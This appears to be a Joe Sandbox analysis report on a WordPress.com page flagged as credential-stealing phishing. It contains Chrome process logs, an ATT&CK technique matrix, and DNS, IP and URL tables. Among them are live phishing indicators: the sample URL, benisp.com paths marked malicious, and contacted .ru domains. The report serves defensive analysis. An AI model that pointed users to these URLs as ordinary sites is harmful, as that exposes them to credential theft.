      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
      Browser Extensions
      1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/100%SlashNextCredential Stealing type: Phishing & Social Engineering
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      stats.wp.com
      192.0.76.3
      truefalse
        high
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          google.com
          142.250.181.110
          truefalse
            high
            benisp.com
            192.185.195.203
            truetrue
              unknown
              wordpress.com
              192.0.78.17
              truefalse
                high
                0.gravatar.com
                192.0.73.2
                truefalse
                  high
                  fonts.wp.com
                  192.0.77.32
                  truefalse
                    high
                    s2.wp.com
                    192.0.77.32
                    truefalse
                      high
                      code.jquery.com
                      151.101.194.137
                      truefalse
                        high
                        pixel.wp.com
                        192.0.76.3
                        truefalse
                          high
                          cdnjs.cloudflare.com
                          104.17.24.14
                          truefalse
                            high
                            gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru
                            104.21.73.56
                            truefalse
                              unknown
                              challenges.cloudflare.com
                              104.18.95.41
                              truefalse
                                high
                                www.google.com
                                142.250.181.132
                                truefalse
                                  high
                                  lb.wordpress.com
                                  192.0.78.13
                                  truefalse
                                    high
                                    s1.wp.com
                                    192.0.77.32
                                    truefalse
                                      high
                                      s0.wp.com
                                      192.0.77.32
                                      truefalse
                                        high
                                        oksu.ertanduzu.ru
                                        172.67.134.231
                                        truefalse
                                          unknown
                                          dnearymedahealthstaffing.wordpress.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            https://pixel.wp.com/g.gif?crypt=UE40eW5QN0p8M2Y%2FRE1mJVY3bm9aR3VCbS9mWm1pRyZuJS1LX1t5QmRXZzE3RC9rQWZHK1FjbDltdWdaMVFFZTcxUGVHLWR0WTJoL2xleFp%2BVXNmM3xVflA0X254PXM%2FJWhaPXRUUXFLanh%2BVUI2Zyt4fE56Y2xlV1EtXzhlTXEuQW5uNFYlWVZkbnpVckd1ZCwzJlNVQkNHWTRoRzJnZVJ6bC04ZlFJdnJLUnpUb2dBLTJKQmhHfEs2fCUvb112ZTZGcHw2S0FYLWljXURFcXxoTVdkT05jSzIvb3Z5OU1LOXxEUHpaK3J1&v=wpcom-no-pv&rand=0.2779972937038586false
                                              high
                                              https://0.gravatar.com/js/hovercards/hovercards.min.js?ver=202451b213a1cbb4e3271ca470eb7790af362ac2e18ce468f8945952c7bd3456d2132efalse
                                                high
                                                https://pixel.wp.com/t.gif?is_current_user_blog_owner=false&_en=wpcom_marketing_bar_impression&_ui=PfqOZc4jPU0a%2FtwKEstg1J5h&_ut=anon&_ts=1734709534238&_tz=5&_lg=en-US&_pf=Win32&_ht=1024&_wd=1280&_sx=0&_sy=0&_dl=https%3A%2F%2Fdnearymedahealthstaffing.wordpress.com%2Fmedahealthstaffing-proposal%2F&_dr=&blog_id=240074490&blog_tz=-8&user_lang=en&blog_lang=en&user_id=0&_rt=1734709534355&_=_false
                                                  high
                                                  https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                    high
                                                    https://s2.wp.com/wp-content/themes/h4/global.css?m=1420737423i&cssminify=yesfalse
                                                      high
                                                      https://s0.wp.com/wp-content/mu-plugins/actionbar/actionbar.css?v=20241015false
                                                        high
                                                        https://oksu.ertanduzu.ru/favicon.icofalse
                                                          unknown
                                                          https://s2.wp.com/i/logo/wpcom-gray-white.pngfalse
                                                            high
                                                            https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OX1zTiCZXVigHPVA.woff2false
                                                              high
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/afqfh/0x4AAAAAAA2Jt48AqtrtyRlV/auto/fbE/normal/auto/false
                                                                high
                                                                https://s2.wp.com/wp-content/themes/pub/fewer/assets/fonts/epilogue_300.ttffalse
                                                                  high
                                                                  https://gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru/occxEbMsaASlqNVkWEqyWydNFGHLKDHUVJNWWLPPADVXYAQOfalse
                                                                    unknown
                                                                    https://s1.wp.com/i/favicon.icofalse
                                                                      high
                                                                      https://s1.wp.com/_static/??-eJx9jcEOwjAMQ3+IEnUH2AXxLVuVlUDaVG2mib8ngAQDJG72S2zDUlyQrJgV0uwKz5FygyApGXJMFzTXvsjWyAYIsihZur3E87Dq1BMmayjzCBMuWKHplfHnbTVdcWSJJuNj923/hSKKYwmDkuQP4yYeqN6jx3Twe9/5Xd/77nwDsx1cLg==&cssminify=yesfalse
                                                                        high
                                                                        https://dnearymedahealthstaffing.wordpress.com/wp-content/uploads/2024/12/onedrive-for-business.webpfalse
                                                                          unknown
                                                                          https://pixel.wp.com/g.gif?x_stats-initial-visibility=visible&v=wpcom-no-pv&rand=0.5533248508418851false
                                                                            high
                                                                            https://s1.wp.com/_static/??/wp-content/mu-plugins/core-compat/wp-mediaelement.css,/wp-content/mu-plugins/wpcom-bbpress-premium-themes.css?m=1432920480j&cssminify=yesfalse
                                                                              high
                                                                              https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                                high
                                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f50c3606cea43b9/1734709569716/Kz4N4jYqxFwMXYkfalse
                                                                                  high
                                                                                  https://oksu.ertanduzu.ru/gk59Agp/#lp4vwvt@iphsll.cofalse
                                                                                    unknown
                                                                                    https://oksu.ertanduzu.ru/gk59Agp/false
                                                                                      unknown
                                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f50c3606cea43b9&lang=autofalse
                                                                                        high
                                                                                        https://dnearymedahealthstaffing.wordpress.com/wp-admin/admin-ajax.phpfalse
                                                                                          unknown
                                                                                          https://benisp.com/favicon.icofalse
                                                                                            unknown
                                                                                            https://s2.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1610363240ifalse
                                                                                              high
                                                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                                                                high
                                                                                                https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                                                                                                  high
                                                                                                  https://s1.wp.com/wp-content/blog-plugins/marketing-bar/images/wpcom-mark.svgfalse
                                                                                                    high
                                                                                                    https://pixel.wp.com/g.gif?blog=240074490&v=wpcom&tz=-8&user_id=0&post=22&subd=dnearymedahealthstaffing&host=dnearymedahealthstaffing.wordpress.com&ref=&rand=0.5972709169619024false
                                                                                                      high
                                                                                                      https://a.nel.cloudflare.com/report/v4?s=Kllo37THIMGIsEktpkFIODih6hoCQ%2BdE%2BD8mDLXcWZdqQnNvqMX3zHKDtnNmN2REPiY%2FNb7fy0luMhC7nDKEeOy4mdSqQXvAtrA4qt1hRU5OaHvhi9Nznasxy1arDQ%3D%3Dfalse
                                                                                                        high
                                                                                                        https://pixel.wp.com/c.gif?u=https%3A%2F%2Fbenisp.com%2Fdan%2Fdann%2Fdannn&r=&b=240074490&p=22&rand=0.1339836907307579false
                                                                                                          high
                                                                                                          https://s1.wp.com/wp-content/js/rlt-proxy.js?m=1720530689ifalse
                                                                                                            high
                                                                                                            https://s0.wp.com/_static/??-eJytjEsKwzAMRC9UR01caLsoPYs/IjhVbGNZCbl9HUKgB+hm4I00D9asXIoVY4VMMobIMEpDi2Vsl4Kw9M/u0V3BSiAPlpL7KAq2mLId1BaGCBty3Qg7x3yBH+8s6lRPWLNp+4NhTmkPL4QMzpQkjAS8hoxFWYn+D7bz6Sx24Xt+9Xet9XDTg56+vYhgvQ==&cssminify=yesfalse
                                                                                                              high
                                                                                                              https://s0.wp.com/_static/??-eJx9jtEOgjAMRX/I0egk8mL8FDPmJB1ru7At/D4jAaM+8HhP7rktzFFZ4ew4g09A0mNwqiQ3maEyhfyWxqcTfPWoqBjKgJzAuxyNHbdcdWF4IlvoC4YXWDNJ3Qqf3g4aQj6YtUK0Xg84urT+9QOOxG1fzbEqf7F6D7qfb1p3rb5eOr8AfZ5eQA==false
                                                                                                                high
                                                                                                                https://stats.wp.com/w.js?67false
                                                                                                                  high
                                                                                                                  https://pixel.wp.com/boom.gif?bilmur=1&batcache_hit=0&provider=wordpress.com&service=simple&rtt=450&downlink=1250&site_host=dnearymedahealthstaffing.wordpress.com&site_path=%2Fmedahealthstaffing-proposal%2F&version=4.0.0&nt=2--____3_1s_9s_9s_19m_9s_1a2_1o2_20i_1o9_4zl_53d_53k_7px_7py_7q1--0_0_0--http%2F1.1&reporter=sendBeacon&fcp=4451&fcp_raw=4451&fp_raw=4451&lcp=4812&lcp_raw=4812&cls=0&ttfb=2161&nav_type=navigate&inp=8false
                                                                                                                    high
                                                                                                                    https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/true
                                                                                                                      unknown
                                                                                                                      https://0.gravatar.com/js/hovercards/hovercards.min.css?ver=202451b213a1cbb4e3271ca470eb7790af362ac2e18ce468f8945952c7bd3456d2132efalse
                                                                                                                        high
                                                                                                                        https://s1.wp.com/_static/??-eJxdjNsKgzAQRH/IuBgpJQ+l3xKTJWguG7Ib/H0VpLR9GTjDzIG9KkdFsAjkrmrqYS0MG0q1Lt4MmegK3xMyNExW0KtKLH80OuYBvpRLovCRZtsiylqCWmyDc/rbXOd3fk1PbR7azJPeDoasOhw=&cssminify=yesfalse
                                                                                                                          high
                                                                                                                          https://s0.wp.com/wp-content/mu-plugins/actionbar/actionbar.js?v=20231122false
                                                                                                                            high
                                                                                                                            https://dnearymedahealthstaffing.wordpress.com/wp-content/js/bilmur-4.min.js?i=12&m=202451false
                                                                                                                              unknown
                                                                                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f50c3606cea43b9/1734709569717/363a0ee5f22899df8d36d93aabc0f17f0a2db9459887d40a787601e0df99dc4e/1ElR6flOiKuTwDMfalse
                                                                                                                                high
                                                                                                                                https://benisp.com/dan/dann/dannntrue
                                                                                                                                  unknown
                                                                                                                                  https://s2.wp.com/wp-includes/js/wp-emoji-release.min.js?m=1719498190i&ver=6.8-alpha-59438false
                                                                                                                                    high
                                                                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                    https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HDtSJ_UqATfVHNU.woff2chromecache_119.2.drfalse
                                                                                                                                      high
                                                                                                                                      https://subscribe.wordpress.com/chromecache_119.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXmTTiCZXVigHPVA.woff2chromecache_119.2.drfalse
                                                                                                                                          high
                                                                                                                                          https://dnearymedahealthstaffing.wordpress.com/wp-admin/site-editor.php?postType=wp_template&#038;pochromecache_119.2.drfalse
                                                                                                                                            unknown
                                                                                                                                            https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCKT5_UqATfVHNU.woff2chromecache_119.2.drfalse
                                                                                                                                              high
                                                                                                                                              https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OX7jTiCZXVigHPVA.woff2chromecache_119.2.drfalse
                                                                                                                                                high
                                                                                                                                                https://wordpress.com/start/chromecache_119.2.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://wordpress.com/abuse/?report_url=https://dnearymedahealthstaffing.wordpress.com/medahealthstachromecache_119.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/onedrive-for-business/chromecache_119.2.drtrue
                                                                                                                                                      unknown
                                                                                                                                                      https://s0.wp.com/_static/??-eJytjEsKwzAMRC9UR01caLsoPYs/IjhVbGNZCbl9HUKgBchromecache_119.2.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXsDPiCZXVigHPVA.woff2chromecache_119.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HDUSJ_UqATfVHNU.woff2chromecache_119.2.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://dnearymedahealthstaffing.wordpress.com/comments/feed/chromecache_119.2.drfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://dnearymedahealthstaffing.wordpress.com/xmlrpc.php?rsdchromecache_119.2.drfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXMDPiCZXVigHPVA.woff2chromecache_119.2.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXAjPiCZXVigHPVA.woff2chromecache_119.2.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://wordpress.com/log-in?redirect_to=https%3A%2F%2Fdnearymedahealthstaffing.wordpress.com%2Fmedachromecache_119.2.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXsDTiCZXVigHPVA.woff2chromecache_119.2.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://i0.wp.com/dnearymedahealthstaffing.wordpress.com/wp-content/uploads/2024/12/onedrive-for-buschromecache_119.2.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.etceteratype.cohttps://www.madebytyler.comThischromecache_97.2.drfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://dnearymedahealthstaffing.wordpress.com/feed/chromecache_119.2.drfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://schema.org/ImageGallerychromecache_119.2.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXbjPiCZXVigHPVA.woff2chromecache_119.2.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://wordpress.orgchromecache_119.2.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://pixel.wp.com/b.gif?v=noscriptchromecache_119.2.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://s2.wp.com/wp-content/themes/pub/fewer/assets/fonts/epilogue_300italic.ttfchromecache_119.2.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://s1.wp.com/_static/??-eJx9jcEOwjAMQ3chromecache_119.2.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://scripts.sil.org/OFLhttps://scripts.sil.org/OFLEpilogueLightEpilogueRomanWeightItalicRomanchromecache_97.2.drfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://dnearymedahealthstaffing.wordpress.com/osd.xmlchromecache_119.2.drfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://dnearymedahealthstaffing.wordpress.comchromecache_119.2.drfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HA4T5_UqATfVHNU.woff2chromecache_119.2.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCjSJ_UqATfVHNU.woff2chromecache_119.2.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://s2.wp.com/wp-content/themes/pub/fewer/assets/fonts/epilogue_500italic.ttfchromecache_119.2.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://wordpress.com/public.api/connect/?action=request&service=wordpresschromecache_95.2.dr, chromecache_104.2.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HAKT5_UqATfVHNU.woff2chromecache_119.2.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://s2.wp.com/i/webclip.pngchromecache_119.2.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://s2.wp.com/wp-content/themes/pub/fewer/assets/fonts/epilogue_500.ttfchromecache_119.2.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXMDLiCZXVigHPVA.woff2chromecache_119.2.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://github.com/Etcetera-Type-Co/Epilogue)Epiloguechromecache_97.2.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://wp.me/Pgfklc-mchromecache_119.2.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://s1.wp.com/_static/??-eJxdjNsKgzAQRH/IuBgpJQchromecache_119.2.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://s0.wp.com/_static/??-eJx9jtEOgjAMRX/I0egk8mL8FDPmJB1ru7At/D4jAaMchromecache_119.2.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://wordpress.com/postchromecache_119.2.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HAKTp_UqATfVHNU.woff2chromecache_119.2.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCKSJ_UqATfVHNU.woff2chromecache_119.2.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://public-api.wordpress.com/oembed/?format=json&amp;url=https%3A%2F%2Fdnearymedahealthstaffing.chromecache_119.2.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://s1.wp.com/_static/??/wp-content/mu-plugins/core-compat/wp-mediaelement.csschromecache_119.2.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://public-api.wordpress.com/oembed/?format=xml&amp;url=https%3A%2F%2Fdnearymedahealthstaffing.wchromecache_119.2.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://wordpress.com/start/?ref=marketing_barchromecache_119.2.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://wordpress.com/public.api/connect/?iframe=truechromecache_95.2.dr, chromecache_104.2.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://subscribe.wordpress.comchromecache_119.2.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://s1.wp.com/opensearch.xmlchromecache_119.2.drfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://wordpress.com/read/blogs/240074490/posts/22chromecache_119.2.drfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HBUT5_UqATfVHNU.woff2chromecache_119.2.drfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                104.17.24.14
                                                                                                                                                                                                                                                cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                192.185.195.203
                                                                                                                                                                                                                                                benisp.comUnited States
                                                                                                                                                                                                                                                46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                                                                                                104.18.94.41
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                192.0.76.3
                                                                                                                                                                                                                                                stats.wp.comUnited States
                                                                                                                                                                                                                                                2635AUTOMATTICUSfalse
                                                                                                                                                                                                                                                104.18.95.41
                                                                                                                                                                                                                                                challenges.cloudflare.comUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                192.0.73.2
                                                                                                                                                                                                                                                0.gravatar.comUnited States
                                                                                                                                                                                                                                                2635AUTOMATTICUSfalse
                                                                                                                                                                                                                                                142.250.181.132
                                                                                                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                151.101.2.137
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                192.0.78.13
                                                                                                                                                                                                                                                lb.wordpress.comUnited States
                                                                                                                                                                                                                                                2635AUTOMATTICUSfalse
                                                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                                                unknownReserved
                                                                                                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                                                                                                192.0.77.32
                                                                                                                                                                                                                                                fonts.wp.comUnited States
                                                                                                                                                                                                                                                2635AUTOMATTICUSfalse
                                                                                                                                                                                                                                                151.101.194.137
                                                                                                                                                                                                                                                code.jquery.comUnited States
                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                35.190.80.1
                                                                                                                                                                                                                                                a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                172.67.134.231
                                                                                                                                                                                                                                                oksu.ertanduzu.ruUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                104.21.73.56
                                                                                                                                                                                                                                                gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ruUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                                192.168.2.11
                                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                Analysis ID:1578995
                                                                                                                                                                                                                                                Start date and time:2024-12-20 16:44:19 +01:00
                                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                Overall analysis duration:0h 3m 35s
                                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                                Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                                Sample URL:https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/
                                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                Number of analysed new started processes analysed:8
                                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                                Classification:mal64.phis.win@25/104@62/16
                                                                                                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                                                                                                • Number of non-executed functions: 0
